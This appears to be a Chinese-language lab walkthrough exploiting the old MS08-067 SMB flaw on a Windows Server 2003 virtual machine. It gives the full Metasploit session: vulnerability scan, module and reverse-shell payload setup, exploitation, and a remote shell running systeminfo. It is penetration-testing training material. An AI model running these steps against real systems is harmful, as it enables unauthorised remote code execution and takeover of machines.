环境
- Kali linux --- IP地址:10.10.10.100
- Windows server 2003(靶机) --- IP地址:10.10.10.130
扫描靶机漏洞信息
msf > db_nmap --script=vuln 10.10.10.130
扫描结果如下,存在ms08-067漏洞。
[*] Nmap: Host script results:
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2008-4250
[*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
[*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization.
[*] Nmap: |
[*] Nmap: | Disclosure date: 2008-10-23
[*] Nmap: | References:
[*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
搜索相关漏洞模块
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf >
加载该漏洞模块
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >
查看可使用payloads,我们选择 generic/shell_reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
generic/custom normal No Custom Payload
generic/debug_trap normal No Generic x86 Debug Trap
generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal No Generic x86 Tight Loop
····
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
查看需要配置的参数。
Module options中,Required为yes的是必须要有参数。
Current Setting 中,为空的需要手动设置,有参数的为默认值,我这里保持默认。
Payload options同Module options。
Exploit target中,Id为0表示自动选择目标的系统类型。可使用show targets查看可选择的系统。
msf exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
设置相关参数,target保持自动。
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.130 #设置目标IP地址
rhost => 10.10.10.130
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.10.100 #设置本地IP地址
lhost => 10.10.10.100
msf exploit(windows/smb/ms08_067_netapi) >
设置好之后,可以check测试是否可以执行攻击,exploit开始执行攻击。
msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.130:445 The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.10.100:4444
[*] 10.10.10.130:445 - Automatically detecting the target...
[*] 10.10.10.130:445 - Fingerprint: Windows 2003 - - lang:Unknown
[*] 10.10.10.130:445 - Selected Target: Windows 2003 SP0 Universal
[*] 10.10.10.130:445 - Attempting to trigger the vulnerability...
C:\WINDOWS\system32>
攻击成功,查看靶机的相关信息。
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name: ROOT-TVI862UBEH
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version: 5.2.3790 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: root
Registered Organization:
Product ID: 69713-640-9722366-45109
Original Install Date: 11/15/2011, 9:50:15 PM
System Up Time: 0 Days, 0 Hours, 52 Minutes, 34 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 10 Stepping 7 GenuineIntel ~3100 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory: 767 MB
Available Physical Memory: 321 MB
Page File: Max Size: 2,474 MB
Page File: Available: 1,808 MB
Page File: In Use: 666 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: File 1
[02]: Q147222
[03]: KB893803v2 - Update
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.130
C:\WINDOWS\system32>
以上为实践记录。
网友评论